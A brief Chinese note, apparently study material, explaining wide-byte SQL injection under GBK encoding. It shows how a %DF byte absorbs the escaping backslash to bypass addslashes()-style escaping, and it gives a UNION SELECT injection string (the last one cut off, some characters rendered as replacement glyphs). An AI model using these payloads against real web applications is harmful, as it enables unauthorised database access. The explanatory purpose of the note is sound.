宽字节注入中常用的特殊字符:
%df
�'
�'
由于汉字编码普遍使用的是GBK编码,而这种编码是一次性读两个字节,利用这个特点就可以实现宽字节注入。
宽字节注入是针对addslashes()、mysql_real_escape_string()、mysql_escape_string()、Magic_quotes_gpc等转义函数的注入
其原理是将转义符号\与%DF组合成一个汉字,使其失去效用
注入语句:
%DF' union select 1,2,3 -- -
�' union select 1,